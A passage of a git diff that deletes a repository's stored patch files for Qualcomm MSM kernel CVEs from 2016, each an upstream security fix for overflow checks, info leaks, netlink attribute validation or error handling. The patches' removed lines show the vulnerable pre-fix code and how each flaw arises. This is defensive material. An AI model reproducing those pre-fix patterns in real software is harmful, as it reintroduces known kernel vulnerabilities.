-
-scm_call2 is printing the input arguments if TZ ret value is < 0
-leading to information leak. Remove printing input arguments.
-
-Change-Id: I21dd6d83fa979aed2c79ebb2c9c8de63a247dded
-CRs-Fixed: 1076407
-Signed-off-by: Swetha Chikkaboraiah
----
- drivers/soc/qcom/scm.c | 12 +++---------
- 1 file changed, 3 insertions(+), 9 deletions(-)
-
-diff --git a/drivers/soc/qcom/scm.c b/drivers/soc/qcom/scm.c
-index 795f33d..d057328 100644
---- a/drivers/soc/qcom/scm.c
-+++ b/drivers/soc/qcom/scm.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2010-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2010-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -644,10 +644,6 @@ int scm_call2(u32 fn_id, struct scm_desc *desc)
-
- desc->ret[0] = desc->ret[1] = desc->ret[2] = 0;
-
-- pr_debug("scm_call: func id %#llx, args: %#x, %#llx, %#llx, %#llx, %#llx\n",
-- x0, desc->arginfo, desc->args[0], desc->args[1],
-- desc->args[2], desc->x5);
--
- if (scm_version == SCM_ARMV8_64)
- ret = __scm_call_armv8_64(x0, desc->arginfo,
- desc->args[0], desc->args[1],
-@@ -667,10 +663,8 @@ int scm_call2(u32 fn_id, struct scm_desc *desc)
- } while (ret == SCM_V2_EBUSY && (retry_count++ < SCM_EBUSY_MAX_RETRY));
-
- if (ret < 0)
-- pr_err("scm_call failed: func id %#llx, arginfo: %#x, args: %#llx, %#llx, %#llx, %#llx, ret: %d, syscall returns: %#llx, %#llx, %#llx\n",
-- x0, desc->arginfo, desc->args[0], desc->args[1],
-- desc->args[2], desc->x5, ret, desc->ret[0],
-- desc->ret[1], desc->ret[2]);
-+ pr_err("scm_call failed: func id %#llx, ret: %d, syscall returns: %#llx, %#llx, %#llx\n",
-+ x0, ret, desc->ret[0], desc->ret[1], desc->ret[2]);
-
- if (arglen > N_REGISTER_ARGS)
- kfree(desc->extra_arg_buf);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8415/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2016-8415/qcacld-2.0/0001.patch
deleted file mode 100644
index 181f800f..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8415/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From 188e12a816508b11771f362c852782ec9a6f9394 Mon Sep 17 00:00:00 2001
-From: Jeff Johnson
-Date: Wed, 19 Oct 2016 07:25:33 -0700
-Subject: qcacld-2.0: Fix hdd_ocb_config_new() signature
-
-hdd_ocb_config_new() takes four "length" parameters, currently defined
-to be of type 'int'. Since these are summed to calculate the size of a
-dynamic memory allocation they must be non-negative so change them to
-'uint32_t'.
-
-Change-Id: Ie66bbb7c69aba92d9d846cb90628110b3bea8f74
-CRs-Fixed: 1079596
----
- CORE/HDD/src/wlan_hdd_ocb.c | 11 ++++++-----
- 1 file changed, 6 insertions(+), 5 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_ocb.c b/CORE/HDD/src/wlan_hdd_ocb.c
-index b6494ca..95fde5e 100644
---- a/CORE/HDD/src/wlan_hdd_ocb.c
-+++ b/CORE/HDD/src/wlan_hdd_ocb.c
-@@ -406,10 +406,11 @@ static int hdd_ocb_register_sta(hdd_adapter_t *adapter)
- *
- * Return: A pointer to the OCB configuration struct, NULL on failure.
- */
--static struct sir_ocb_config *hdd_ocb_config_new(int num_channels,
-- int num_schedule,
-- int ndl_chan_list_len,
-- int ndl_active_state_list_len)
-+static
-+struct sir_ocb_config *hdd_ocb_config_new(uint32_t num_channels,
-+ uint32_t num_schedule,
-+ uint32_t ndl_chan_list_len,
-+ uint32_t ndl_active_state_list_len)
- {
- struct sir_ocb_config *ret = 0;
- uint32_t len;
-@@ -903,7 +904,7 @@ static int __wlan_hdd_cfg80211_ocb_set_config(struct wiphy *wiphy,
- void *def_tx_param = NULL;
- uint32_t def_tx_param_size = 0;
- int i;
-- int channel_count, schedule_size;
-+ uint32_t channel_count, schedule_size;
- struct sir_ocb_config *config;
- int rc = -EINVAL;
- uint8_t *mac_addr;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8416/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8416/ANY/0001.patch
deleted file mode 100644
index b08ceefb..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8416/ANY/0001.patch
+++ /dev/null
@@ -1,73 +0,0 @@
-From e3af5e89426f1c8d4e703d415eff5435b925649f Mon Sep 17 00:00:00 2001
-From: Benet Clark
-Date: Thu, 10 Nov 2016 17:49:09 -0800
-Subject: msm: mdss: Clear compat structures before copying to user
-
-In the compat layer, the temporary structures used to convert
-data from 32bit to 64bit structures need to be set to 0 before
-being assigned values.
-
-CRs-Fixed: 1088206
-Change-Id: I04497bc11e01c3df4beadfd6d9b06ab4321f1723
-Signed-off-by: Benet Clark
----
- drivers/video/msm/mdss/mdss_compat_utils.c | 8 ++++++++
- 1 file changed, 8 insertions(+)
-
-diff --git a/drivers/video/msm/mdss/mdss_compat_utils.c b/drivers/video/msm/mdss/mdss_compat_utils.c
-index 5ad51dd..a9ab5c1 100644
---- a/drivers/video/msm/mdss/mdss_compat_utils.c
-+++ b/drivers/video/msm/mdss/mdss_compat_utils.c
-@@ -846,6 +846,7 @@ static int __from_user_pcc_coeff_v17(
- return -EFAULT;
- }
-
-+ memset(&pcc_cfg_payload, 0, sizeof(pcc_cfg_payload));
- pcc_cfg_payload.r.b = pcc_cfg_payload32.r.b;
- pcc_cfg_payload.r.g = pcc_cfg_payload32.r.g;
- pcc_cfg_payload.r.c = pcc_cfg_payload32.r.c;
-@@ -1127,6 +1128,8 @@ static int __from_user_igc_lut_data_v17(
- pr_err("failed to copy payload from user for igc\n");
- return -EFAULT;
- }
-+
-+ memset(&igc_cfg_payload, 0, sizeof(igc_cfg_payload));
- igc_cfg_payload.c0_c1_data = compat_ptr(igc_cfg_payload_32.c0_c1_data);
- igc_cfg_payload.c2_data = compat_ptr(igc_cfg_payload_32.c2_data);
- igc_cfg_payload.len = igc_cfg_payload_32.len;
-@@ -1261,6 +1264,7 @@ static int __from_user_pgc_lut_data_v1_7(
- pr_err("failed to copy from user the pgc32 payload\n");
- return -EFAULT;
- }
-+ memset(&pgc_cfg_payload, 0, sizeof(pgc_cfg_payload));
- pgc_cfg_payload.c0_data = compat_ptr(pgc_cfg_payload_32.c0_data);
- pgc_cfg_payload.c1_data = compat_ptr(pgc_cfg_payload_32.c1_data);
- pgc_cfg_payload.c2_data = compat_ptr(pgc_cfg_payload_32.c2_data);
-@@ -1470,6 +1474,7 @@ static int __from_user_hist_lut_data_v1_7(
- return -EFAULT;
- }
-
-+ memset(&hist_lut_cfg_payload, 0, sizeof(hist_lut_cfg_payload));
- hist_lut_cfg_payload.len = hist_lut_cfg_payload32.len;
- hist_lut_cfg_payload.data = compat_ptr(hist_lut_cfg_payload32.data);
-
-@@ -2024,6 +2029,7 @@ static int __from_user_pa_data_v1_7(
- return -EFAULT;
- }
-
-+ memset(&pa_cfg_payload, 0, sizeof(pa_cfg_payload));
- pa_cfg_payload.mode = pa_cfg_payload32.mode;
- pa_cfg_payload.global_hue_adj = pa_cfg_payload32.global_hue_adj;
- pa_cfg_payload.global_sat_adj = pa_cfg_payload32.global_sat_adj;
-@@ -2280,6 +2286,8 @@ static int __from_user_gamut_cfg_data_v17(
- pr_err("failed to copy the gamut payload from userspace\n");
- return -EFAULT;
- }
-+
-+ memset(&gamut_cfg_payload, 0, sizeof(gamut_cfg_payload));
- gamut_cfg_payload.mode = gamut_cfg_payload32.mode;
- for (i = 0; i < MDP_GAMUT_TABLE_NUM_V1_7; i++) {
- gamut_cfg_payload.tbl_size[i] =
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8417/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8417/ANY/0001.patch
deleted file mode 100644
index 7a915874..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8417/ANY/0001.patch
+++ /dev/null
@@ -1,32 +0,0 @@
-From 01dcc0a7cc23f23a89adf72393d5a27c6d576cd0 Mon Sep 17 00:00:00 2001
-From: Krishnankutty Kolathappilly
-Date: Mon, 14 Nov 2016 18:46:12 -0800
-Subject: msm: camera: fix bound check of offset to avoid overread overwrite
-
-fix bound check of hw_cmd_p->offset in msm_jpeg_hw_exec_cmds
-to avoid overread overwrite.
-
-CRs-Fixed: 1088824
-
-Change-Id: Ifaa4b5387d4285ddce16d8e745aa0500c64c568b
-Signed-off-by: Krishnankutty Kolathappilly
----
- drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_hw.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_hw.c b/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_hw.c
-index d67ab11..9bc37a0 100644
---- a/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_hw.c
-+++ b/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_hw.c
-@@ -501,7 +501,7 @@ int msm_jpeg_hw_exec_cmds(struct msm_jpeg_hw_cmd *hw_cmd_p, uint32_t m_cmds,
- uint32_t data;
-
- while (m_cmds--) {
-- if (hw_cmd_p->offset > max_size) {
-+ if (hw_cmd_p->offset >= max_size) {
- JPEG_PR_ERR("%s:%d] %d exceed hw region %d\n", __func__,
- __LINE__, hw_cmd_p->offset, max_size);
- return -EFAULT;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8418/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8418/ANY/0001.patch
deleted file mode 100644
index 5106e47e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8418/ANY/0001.patch
+++ /dev/null
@@ -1,42 +0,0 @@
-From 8f8066581a8e575a7d57d27f36c4db63f91ca48f Mon Sep 17 00:00:00 2001
-From: Zhen Kong
-Date: Mon, 24 Oct 2016 13:52:04 -0700
-Subject: msm: crypto: Fix integer over flow check in qce driver
-
-Integer overflow check is invalid when ULONG_MAX is used,
-as ULONG_MAX has typeof 'unsigned long', while areq->assoclen,
-q_req->crytlen, and qreq.ivsize are 'unsigned int'. Make change
-to use UINT_MAX instead of ULONG_MAX.
-
-Change-Id: If2bb1900c07af1ea162da362c913d4880b0bc755
-Signed-off-by: Zhen Kong
----
- drivers/crypto/msm/qce.c | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/crypto/msm/qce.c b/drivers/crypto/msm/qce.c
-index 7ddbb19..4cf95b9 100644
---- a/drivers/crypto/msm/qce.c
-+++ b/drivers/crypto/msm/qce.c
-@@ -1,6 +1,6 @@
- /* Qualcomm Crypto Engine driver.
- *
-- * Copyright (c) 2010-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2010-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -1962,8 +1962,8 @@ int qce_aead_req(void *handle, struct qce_req *q_req)
- else
- q_req->cryptlen = areq->cryptlen - authsize;
-
-- if ((q_req->cryptlen > ULONG_MAX - ivsize) ||
-- (q_req->cryptlen + ivsize > ULONG_MAX - areq->assoclen)) {
-+ if ((q_req->cryptlen > UINT_MAX - ivsize) ||
-+ (q_req->cryptlen + ivsize > UINT_MAX - areq->assoclen)) {
- pr_err("Integer overflow on total aead req length.\n");
- return -EINVAL;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8419/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2016-8419/qcacld-2.0/0001.patch
deleted file mode 100644
index fd371144..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8419/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,117 +0,0 @@
-From 9ba50d536227666a5b6abd51f2b122675d950488 Mon Sep 17 00:00:00 2001
-From: Jeff Johnson
-Date: Wed, 9 Nov 2016 09:01:10 -0800
-Subject: qcacld-2.0: Properly parse PNO vendor command
-
-Currently there is a single wlan_hdd_extscan_config_policy which
-contains entries for both EXTSCAN and PNO attributes. However the
-EXTSCAN and PNO attributes have separate and overlapping
-assignments. Therefore one policy cannot be used by both types of
-commands. In addition, when parsing nested PNO attributes the policy
-is not used, and hence no checking is performed on the nested
-data. This can result in a buffer overflow.
-
-To address these issues introduce a new policy for PNO vendor
-commands, and use that policy both when parsing the initial command
-and when parsing the nested attributes. Furthermore add a zero length
-SSID check to prevent underflow.
-
-Change-Id: I92c8fc7ca1c44971502ea68b5486a2b3ae941cc5
-CRs-Fixed: 1087209
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 45 +++++++++++++++++++++++++++-------------
- 1 file changed, 31 insertions(+), 14 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index c9e62c4..f488edc 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -842,11 +842,6 @@ wlan_hdd_extscan_config_policy[QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_
- [QCA_WLAN_VENDOR_ATTR_EXTSCAN_SIGNIFICANT_CHANGE_PARAMS_LOST_AP_SAMPLE_SIZE] = { .type = NLA_U32 },
- [QCA_WLAN_VENDOR_ATTR_EXTSCAN_SIGNIFICANT_CHANGE_PARAMS_MIN_BREACHING] = { .type = NLA_U32 },
- [QCA_WLAN_VENDOR_ATTR_EXTSCAN_SIGNIFICANT_CHANGE_PARAMS_NUM_AP] = { .type = NLA_U32 },
-- [QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_NUM_NETWORKS] = { .type = NLA_U32 },
-- [QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORK_SSID] = { .type = NLA_BINARY,
-- .len = IEEE80211_MAX_SSID_LEN },
-- [QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORK_FLAGS] = { .type = NLA_U8 },
-- [QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORK_AUTH_BIT] = { .type = NLA_U8 },
- [QCA_WLAN_VENDOR_ATTR_EXTSCAN_SSID_THRESHOLD_PARAM_SSID] = { .type = NLA_BINARY,
- .len = IEEE80211_MAX_SSID_LEN + 1 },
- [QCA_WLAN_VENDOR_ATTR_EXTSCAN_SSID_HOTLIST_PARAMS_LOST_SSID_SAMPLE_SIZE] = { .type = NLA_U32 },
-@@ -858,6 +853,23 @@ wlan_hdd_extscan_config_policy[QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_
- };
-
- static const struct nla_policy
-+wlan_hdd_pno_config_policy[QCA_WLAN_VENDOR_ATTR_PNO_MAX + 1] = {
-+ [QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_NUM_NETWORKS] = {
-+ .type = NLA_U32
-+ },
-+ [QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORK_SSID] = {
-+ .type = NLA_BINARY,
-+ .len = IEEE80211_MAX_SSID_LEN + 1
-+ },
-+ [QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORK_FLAGS] = {
-+ .type = NLA_U8
-+ },
-+ [QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORK_AUTH_BIT] = {
-+ .type = NLA_U8
-+ },
-+};
-+
-+static const struct nla_policy
- wlan_hdd_extscan_results_policy[QCA_WLAN_VENDOR_ATTR_EXTSCAN_RESULTS_MAX + 1] =
- {
- [QCA_WLAN_VENDOR_ATTR_EXTSCAN_RESULTS_SCAN_RESULT_BEACON_PERIOD] = { .type = NLA_U16 },
-@@ -4672,19 +4684,18 @@ static int hdd_extscan_epno_fill_network_list(
- struct wifi_epno_params *req_msg,
- struct nlattr **tb)
- {
-- struct nlattr *network[
-- QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_MAX + 1];
-+ struct nlattr *network[QCA_WLAN_VENDOR_ATTR_PNO_MAX + 1];
- struct nlattr *networks;
- int rem1, ssid_len;
- uint8_t index, *ssid;
-
- index = 0;
- nla_for_each_nested(networks,
-- tb[QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORKS_LIST],
-- rem1) {
-- if (nla_parse(network,
-- QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_MAX,
-- nla_data(networks), nla_len(networks), NULL)) {
-+ tb[QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORKS_LIST],
-+ rem1) {
-+ if (nla_parse(network, QCA_WLAN_VENDOR_ATTR_PNO_MAX,
-+ nla_data(networks), nla_len(networks),
-+ wlan_hdd_pno_config_policy)) {
- hddLog(LOGE, FL("nla_parse failed"));
- return -EINVAL;
- }
-@@ -4697,6 +4708,12 @@ static int hdd_extscan_epno_fill_network_list(
- ssid_len = nla_len(
- network[QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORK_SSID]);
-
-+ /* nla_parse will detect overflow but not underflow */
-+ if (0 == ssid_len) {
-+ hddLog(LOGE, FL("zero ssid length"));
-+ return -EINVAL;
-+ }
-+
- /* Decrement by 1, don't count null character */
- ssid_len--;
-
-@@ -4771,8 +4788,8 @@ static int __wlan_hdd_cfg80211_set_epno_list(struct wiphy *wiphy,
- }
-
- if (nla_parse(tb, QCA_WLAN_VENDOR_ATTR_PNO_MAX,
-- data, data_len,
-- wlan_hdd_extscan_config_policy)) {
-+ data, data_len,
-+ wlan_hdd_pno_config_policy)) {
- hddLog(LOGE, FL("Invalid ATTR"));
- return -EINVAL;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8420/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2016-8420/qcacld-2.0/0001.patch
deleted file mode 100644
index 1a0b35c6..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8420/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,56 +0,0 @@
-From c6597e015a7ce5ee71d3725fc55e64fc50923f4e Mon Sep 17 00:00:00 2001
-From: Jeff Johnson
-Date: Wed, 9 Nov 2016 10:23:02 -0800
-Subject: qcacld-2.0: Avoid overflow of EPNO network list
-
-Currently when processing an EPNO vendor command the "num networks"
-attribute is limit checked and if it exceeds a MAX value then it is
-reset to that MAX value. This value is then used to calculate the size
-of the buffer allocated to hold the internal representation of the
-request. However later when the network attributes are parsed there is
-no check to make sure the number of networks processed does not exceed
-the (possibly modified) "num networks" used to allocate memory, and as
-a result a buffer overflow can occur. Address this issue by aborting
-the network parsing once "num networks" records have been parsed.
-
-Change-Id: I6e5f321d23471d082bb000ad0422ea9baa76577a
-CRs-Fixed: 1087807
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 9 +++++++++
- 1 file changed, 9 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index 92cbb67..233482d 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -4825,11 +4825,19 @@ static int hdd_extscan_epno_fill_network_list(
- struct nlattr *networks;
- int rem1, ssid_len;
- uint8_t index, *ssid;
-+ uint32_t expected_networks;
-
-+ expected_networks = req_msg->num_networks;
- index = 0;
- nla_for_each_nested(networks,
- tb[QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORKS_LIST],
- rem1) {
-+
-+ if (index == expected_networks) {
-+ hddLog(LOGW, FL("ignoring excess networks"));
-+ break;
-+ }
-+
- if (nla_parse(network, QCA_WLAN_VENDOR_ATTR_PNO_MAX,
- nla_data(networks), nla_len(networks),
- wlan_hdd_pno_config_policy)) {
-@@ -4883,6 +4891,7 @@ static int hdd_extscan_epno_fill_network_list(
-
- index++;
- }
-+ req_msg->num_networks = index;
- return 0;
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8421/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2016-8421/qcacld-2.0/0001.patch
deleted file mode 100644
index 150a6585..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8421/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,76 +0,0 @@
-From 61a5cdb9adc96645583f528ac923e6e59f3abbcb Mon Sep 17 00:00:00 2001
-From: Jeff Johnson
-Date: Wed, 9 Nov 2016 11:22:57 -0800
-Subject: qcacld-2.0: Avoid overflow of EXTSCAN bucket list
-
-Currently when processing an EXTSCAN vendor command the "num buckets"
-attribute is limit checked and if it exceeds a MAX value then a
-warning message is issued. But beyond that the "num buckets" attribute
-is not used. Instead when the buckets are actually parsed the number
-of buckets is calculated dynamically based upon the number of
-attributes present in the request. Unfortunately when the bucket
-attributes are parsed there is no check to make sure the number of
-buckets processed does not exceed the MAX value, and as a result a
-buffer overflow can occur. Address this issue by aborting the bucket
-parsing once the expected number of records have been parsed.
-
-Change-Id: Ic260dd65dc99118afbb8042d102acb5b26d1e123
-CRs-Fixed: 1087797
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 13 ++++++++++++-
- 1 file changed, 12 insertions(+), 1 deletion(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index f488edc..ce8043d 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -3531,6 +3531,7 @@ static int hdd_extscan_start_fill_bucket_channel_spec(
- int rem1, rem2;
- eHalStatus status;
- uint8_t bktIndex, j, numChannels, total_channels = 0;
-+ uint32_t expected_buckets;
- uint32_t chanList[WNI_CFG_VALID_CHANNEL_LIST_LEN] = {0};
-
- uint32_t min_dwell_time_active_bucket =
-@@ -3542,7 +3543,6 @@ static int hdd_extscan_start_fill_bucket_channel_spec(
- uint32_t max_dwell_time_passive_bucket =
- pHddCtx->cfg_ini->extscan_passive_max_chn_time;
-
-- bktIndex = 0;
- pReqMsg->min_dwell_time_active =
- pReqMsg->max_dwell_time_active =
- pHddCtx->cfg_ini->extscan_active_max_chn_time;
-@@ -3550,10 +3550,19 @@ static int hdd_extscan_start_fill_bucket_channel_spec(
- pReqMsg->min_dwell_time_passive =
- pReqMsg->max_dwell_time_passive =
- pHddCtx->cfg_ini->extscan_passive_max_chn_time;
-+
-+ expected_buckets = pReqMsg->numBuckets;
- pReqMsg->numBuckets = 0;
-+ bktIndex = 0;
-
- nla_for_each_nested(buckets,
- tb[QCA_WLAN_VENDOR_ATTR_EXTSCAN_BUCKET_SPEC], rem1) {
-+
-+ if (bktIndex >= expected_buckets) {
-+ hddLog(LOGW, FL("ignoring excess buckets"));
-+ break;
-+ }
-+
- if (nla_parse(bucket,
- QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_MAX,
- nla_data(buckets), nla_len(buckets), NULL)) {
-@@ -4055,8 +4064,10 @@ static int __wlan_hdd_cfg80211_extscan_start(struct wiphy *wiphy,
- hddLog(LOGW,
- FL("Exceeded MAX number of buckets: %d"),
- WLAN_EXTSCAN_MAX_BUCKETS);
-+ num_buckets = WLAN_EXTSCAN_MAX_BUCKETS;
- }
- hddLog(LOG1, FL("Input: Number of Buckets %d"), num_buckets);
-+ pReqMsg->numBuckets = num_buckets;
-
- /* This is optional attribute, if not present set it to 0 */
- if (!tb[PARAM_CONFIG_FLAGS])
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8434/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8434/ANY/0001.patch
deleted file mode 100644
index afc04c26..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8434/ANY/0001.patch
+++ /dev/null
@@ -1,58 +0,0 @@
-From 3e3866a5fced40ccf9ca442675cf915961efe4d9 Mon Sep 17 00:00:00 2001
-From: Jeremy Gebben
-Date: Fri, 27 Feb 2015 11:32:29 -0700
-Subject: msm: kgsl: fix sync file error handling
-
-We need to call put_unused_fd() on failure, but only if
-a file hasn't been stored into the fd yet. This function
-wasn't called from kgsl_ioctl_syncsource_create_fence()
-and was called incorrectly from kgsl_add_fence_event().
-Reorder our sync_fence_install() calls to happen after
-all possible failures so that error cleanup will be
-correct.
-
-Change-Id: I0e7bb459f2acc010446ac5e5b3b72c8b16cce079
-Signed-off-by: Jeremy Gebben
----
- drivers/gpu/msm/kgsl_sync.c | 10 +++++++---
- 1 file changed, 7 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/gpu/msm/kgsl_sync.c b/drivers/gpu/msm/kgsl_sync.c
-index 4695b33..9e9e058 100644
---- a/drivers/gpu/msm/kgsl_sync.c
-+++ b/drivers/gpu/msm/kgsl_sync.c
-@@ -203,7 +203,6 @@ int kgsl_add_fence_event(struct kgsl_device *device,
- ret = priv.fence_fd;
- goto out;
- }
-- sync_fence_install(fence, priv.fence_fd);
-
- /*
- * If the timestamp hasn't expired yet create an event to trigger it.
-@@ -222,9 +221,11 @@ int kgsl_add_fence_event(struct kgsl_device *device,
- goto out;
- }
-
-- if (copy_to_user(data, &priv, sizeof(priv)))
-+ if (copy_to_user(data, &priv, sizeof(priv))) {
- ret = -EFAULT;
--
-+ goto out;
-+ }
-+ sync_fence_install(fence, priv.fence_fd);
- out:
- kgsl_context_put(context);
- if (ret) {
-@@ -599,6 +600,9 @@ out:
- if (ret) {
- if (fence)
- sync_fence_put(fence);
-+ if (fd >= 0)
-+ put_unused_fd(fd);
-+
- }
- kgsl_syncsource_put(syncsource);
- return ret;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8436/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8436/ANY/0001.patch
deleted file mode 100644
index 9d934680..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8436/ANY/0001.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From 228e8d17b9f5d22cf9896ab8eff88dc6737c2ced Mon Sep 17 00:00:00 2001
-From: Shalini Krishnamoorthi
-Date: Thu, 12 May 2016 12:13:23 -0700
-Subject: msm: mdss: Fix NULL pointer dereference
-
-A wrong pointer was freed and dereferenced
-leading to fatal exception. Fixed this by
-correcting the pointer variable.
-
-Change-Id: Ic3d55d88c61ab215139de7fe0c53b8bb89bf85f8
-Signed-off-by: Shalini Krishnamoorthi
----
- drivers/video/msm/mdss/mdss_dsi.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/video/msm/mdss/mdss_dsi.c b/drivers/video/msm/mdss/mdss_dsi.c
-index 4df7e98..403444f 100644
---- a/drivers/video/msm/mdss/mdss_dsi.c
-+++ b/drivers/video/msm/mdss/mdss_dsi.c
-@@ -2802,7 +2802,7 @@ static int mdss_dsi_ctrl_clock_init(struct platform_device *ctrl_pdev,
- error_clk_client_deregister:
- mdss_dsi_clk_deregister(ctrl_pdata->dsi_clk_handle);
- error_clk_deinit:
-- mdss_dsi_clk_deinit(ctrl_pdata);
-+ mdss_dsi_clk_deinit(ctrl_pdata->clk_mngr);
- error_link_clk_deinit:
- mdss_dsi_link_clk_deinit(&ctrl_pdev->dev, ctrl_pdata);
- return rc;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8444/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8444/ANY/0001.patch
deleted file mode 100644
index 8c38bb7e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8444/ANY/0001.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From 78506ab75e0cbbfbf372867cc24282d7e739f4d6 Mon Sep 17 00:00:00 2001
-From: Ranjith Kagathi Ananda
-Date: Fri, 4 Sep 2015 16:48:10 -0700
-Subject: [PATCH] msm: ispif: Remove handling of SD_SHUTDOWN
-
-Remove handling of SD_SHUTDOWN to avoid multiple release.
-
-Bug: 31243641
-
-Change-Id: I09db8adb766d2e7889443f779a716aaa2f6c09d1
-Signed-off-by: Harsh Shah
-Signed-off-by: Ranjith Kagathi Ananda
----
- drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c | 4 ----
- 1 file changed, 4 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c b/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-index 5115e3853fe1c..fb1f93cd4c0bc 100644
---- a/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-+++ b/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-@@ -1325,10 +1325,6 @@ static long msm_ispif_subdev_ioctl(struct v4l2_subdev *sd,
- case VIDIOC_MSM_ISPIF_CFG:
- return msm_ispif_cmd(sd, arg);
- case MSM_SD_SHUTDOWN: {
-- struct ispif_device *ispif =
-- (struct ispif_device *)v4l2_get_subdevdata(sd);
-- if (ispif && ispif->base)
-- msm_ispif_release(ispif);
- return 0;
- }
- default:
diff --git a/Patches/Linux_CVEs/CVE-2016-8450/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8450/ANY/0001.patch
deleted file mode 100644
index ef1f72fd..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8450/ANY/0001.patch
